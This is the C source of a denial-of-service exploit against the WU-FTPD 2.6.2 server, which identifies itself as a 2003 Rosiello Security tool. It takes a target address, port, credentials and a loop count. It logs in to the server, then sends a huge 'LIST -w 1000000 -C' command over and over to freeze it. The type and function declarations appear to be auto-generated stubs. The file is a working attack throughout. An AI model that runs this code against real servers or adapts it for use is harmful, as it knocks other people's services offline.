
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int dummy; } ;
struct sockaddr {int dummy; } ;
typedef int server_addr ;


 int AF_INET ;
 int SOCK_STREAM ;
 int addr_initialize (struct sockaddr_in*,int,long) ;
 int atoi (char*) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 int fprintf (int ,char*) ;
 scalar_t__ inet_addr (char*) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int recv (int,char*,int,int ) ;
 int send (int,char*,int,int ) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,char*) ;
 int stdout ;
 int strlen (char*) ;
 int usage (char*) ;
 int write (int,char*,int) ;

int main( int argc, char **argv )
{
 int i, sd, PORT, loop, error;
 char user[30], password[30], ch;
 struct sockaddr_in server_addr;

 fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
 fprintf( stdout, "http://www.rosiello.org\n" );
 fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

 if( argc != 6 ) usage( argv[0] );

 if( strlen( argv[3] ) > 20 ) exit( 0 );
 if( strlen( argv[4] ) > 20 ) exit( 0 );

 sprintf( user, "USER %s\n", argv[3] );
 sprintf( password, "PASS %s\n", argv[4] );

 PORT = atoi( argv[2] );
 loop = atoi( argv[5] );

 addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
 sd = socket( AF_INET, SOCK_STREAM, 0 );

 error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
 if( error != 0 )
 {
  perror( "Something wrong with the connection" );
  exit( 0 );
 }

 while ( ch != '\n' )
 {
  recv( sd, &ch, 1, 0);
  printf("%c", ch );
 }

 ch = '\0';

 printf( "Connection executed, now waiting to log in...\n" );

 printf( "%s", user );

 send( sd, user, strlen( user ), 0 );
 while ( ch != '\n' )
 {
  recv( sd, &ch, 1, 0);
  printf("%c", ch );
 }
 printf( "%s", password );

 ch = '\0';

 send( sd, password, strlen( password ), 0 );
 while ( ch != '\n' )
 {
  recv( sd, &ch, 1, 0);
  printf("%c", ch );
 }

 printf( "Sending the DoS query\n" );
 for( i=0; i<loop; i++ )
 {
  write( sd, "LIST -w 1000000 -C\n", 19 );
 }
 printf( "All done\n" );
 close( sd );
 return 0;
}
